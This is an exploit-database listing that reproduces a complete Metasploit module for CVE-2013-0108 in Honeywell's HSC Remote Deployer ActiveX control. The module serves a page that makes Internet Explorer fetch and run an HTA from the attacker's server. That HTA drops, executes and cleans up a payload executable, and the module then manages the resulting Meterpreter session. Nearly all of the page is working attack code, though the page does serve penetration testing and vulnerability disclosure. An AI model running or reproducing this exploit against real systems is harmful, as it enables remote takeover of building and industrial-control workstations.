Honeywell HSC Remote Deployer ActiveX Remote Code Execution



EKU-ID: 3073 CVE: 2013-0108 OSVDB-ID: 90583
Author: juan vazquez Published: 2013-03-12 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::EXE

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Honeywell HSC Remote Deployer ActiveX Remote Code Execution",
			'Description'    => %q{
					This modules exploits a vulnerability found in the Honewell HSC Remote Deployer
				ActiveX. This control can be abused by using the LaunchInstaller() function to
				execute an arbitrary HTA from a remote location. This module has been tested
				successfully with the HSC Remote Deployer ActiveX installed with HoneyWell EBI
				R410.1.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'juan vazquez'
				],
			'References'     =>
				[
					[ 'CVE', '2013-0108' ],
					[ 'OSVDB', '90583' ],
					[ 'BID', '58134' ],
					[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/03/11/cve-2013-0108-honeywell-ebi' ],
					[ 'URL', 'http://ics-cert.us-cert.gov/pdf/ICSA-13-053-02.pdf' ]
				],
			'Payload'        =>
				{
					'Space'    => 2048,
					'StackAdjustment' => -3500
				},
			'DefaultOptions'  =>
				{
					'InitialAutoRunScript' => 'migrate -f -k'
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', {} ]
				],
			'Privileged'     => false,
			'DisclosureDate' => "Feb 22 2013",
			'DefaultTarget'  => 0))
	end

	def exploit
		@var_exename = rand_text_alpha(5 + rand(5)) + ".exe"
		@dropped_files = [
			@var_exename
		]
		super
	end

	def on_new_session(session)
		if session.type == "meterpreter"
			session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
		end

		@dropped_files.delete_if do |file|
			win_file = file.gsub("/", "\\\\")
			if session.type == "meterpreter"
				begin
					wintemp = session.fs.file.expand_path("%TEMP%")
					win_file = "#{wintemp}\\#{win_file}"
					session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
					session.fs.file.rm(win_file)
					print_good("Deleted #{file}")
					true
				rescue ::Rex::Post::Meterpreter::RequestError
					print_error("Failed to delete #{win_file}")
					false
				end

			end
		end
	end

	def build_hta(cli)
		var_shellobj		= rand_text_alpha(rand(5)+5);
		var_fsobj		= rand_text_alpha(rand(5)+5);
		var_fsobj_file		= rand_text_alpha(rand(5)+5);
		var_vbsname		= rand_text_alpha(rand(5)+5);
		var_writedir		= rand_text_alpha(rand(5)+5);

		var_origLoc		= rand_text_alpha(rand(5)+5);
		var_byteArray		= rand_text_alpha(rand(5)+5);
		var_writestream		= rand_text_alpha(rand(5)+5);
		var_strmConv		= rand_text_alpha(rand(5)+5);

		p = regenerate_payload(cli);
		exe = generate_payload_exe({ :code => p.encoded })

		# Doing in this way to bypass the ADODB.Stream restrictions on JS,
		# even when executing it as an "HTA" application
		# The encoding code has been stolen from ie_unsafe_scripting.rb
		print_status("Encoding payload into vbs/javascript/hta...");

		# Build the content that will end up in the .vbs file
		vbs_content	= Rex::Text.to_hex(%Q|
Dim #{var_origLoc}, s, #{var_byteArray}
#{var_origLoc} = SetLocale(1033)
|)
		# Drop the exe payload into an ansi string (ansi ensured via SetLocale above)
		# for conversion with ADODB.Stream
		vbs_ary = []
		# The output of this loop needs to be as small as possible since it
		# gets repeated for every byte of the executable, ballooning it by a
		# factor of about 80k (the current size of the exe template).  In its
		# current form, it's down to about 4MB on the wire
		exe.each_byte do |b|
			vbs_ary << Rex::Text.to_hex("s=s&Chr(#{("%d" % b)})\n")
		end
		vbs_content << vbs_ary.join("")

		# Continue with the rest of the vbs file;
		# Use ADODB.Stream to convert from an ansi string to it's byteArray equivalent
		# Then use ADODB.Stream again to write the binary to file.
		#print_status("Finishing vbs...");
		vbs_content << Rex::Text.to_hex(%Q|
Dim #{var_strmConv}, #{var_writedir}, #{var_writestream}
										#{var_writedir} = WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%TEMP%") & "\\#{@var_exename}"

Set #{var_strmConv} = CreateObject("ADODB.Stream")

#{var_strmConv}.Type = 2
#{var_strmConv}.Charset = "x-ansi"
#{var_strmConv}.Open
#{var_strmConv}.WriteText s, 0
#{var_strmConv}.Position = 0
#{var_strmConv}.Type = 1
#{var_strmConv}.SaveToFile #{var_writedir}, 2

SetLocale(#{var_origLoc})|)

		hta = <<-EOS
			<script>
			var #{var_shellobj} = new ActiveXObject("WScript.Shell");
			var #{var_fsobj}    = new ActiveXObject("Scripting.FileSystemObject");
			var #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings("%TEMP%");
			var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs",2,true);

			#{var_fsobj_file}.Write(unescape("#{vbs_content}"));
			#{var_fsobj_file}.Close();

			#{var_shellobj}.run("wscript.exe " + #{var_writedir} + "\\\\" + "#{var_vbsname}.vbs", 1, true);
			#{var_shellobj}.run(#{var_writedir} + "\\\\" + "#{@var_exename}", 0, false);
			#{var_fsobj}.DeleteFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs");
			window.close();
			</script>
		EOS

		return hta
	end

	def on_request_uri(cli, request)
		agent = request.headers['User-Agent']

		if agent !~ /MSIE \d/
			print_error("Browser not supported: #{agent.to_s}")
			send_not_found(cli)
			return
		end

		uri  = ((datastore['SSL']) ? "https://" : "http://")
		uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST'])
		uri << ":#{datastore['SRVPORT']}"

		print_status("Request received for #{request.uri}");

		if request.uri =~ /\/SystemDisplays\/RemoteInstallWelcome.hta/
			hta = build_hta(cli)
			print_status("Sending HTA application")
			send_response(cli, hta, {'Content-Type'=>'application/hta'})
			return
		end

		html = <<-EOS
		<html>
		<body>
		<object id="RemoteInstaller" classid="clsid:0D080D7D-28D2-4F86-BFA1-D582E5CE4867">
		</object>
		<script>
			RemoteInstaller.LaunchInstaller("#{uri}", "", false);
		</script>
		</body>
		</html>
		EOS

		# we need to handle direct /SystemDisplays/RemoteInstallWelcome.hta requests
		proc = Proc.new do |cli, req|
			on_request_uri(cli, req)
		end

		add_resource({'Path' => "/SystemDisplays/RemoteInstallWelcome.hta", 'Proc' => proc}) rescue nil

		print_status("Sending html")
		send_response(cli, html, {'Content-Type'=>'text/html'})

	end

end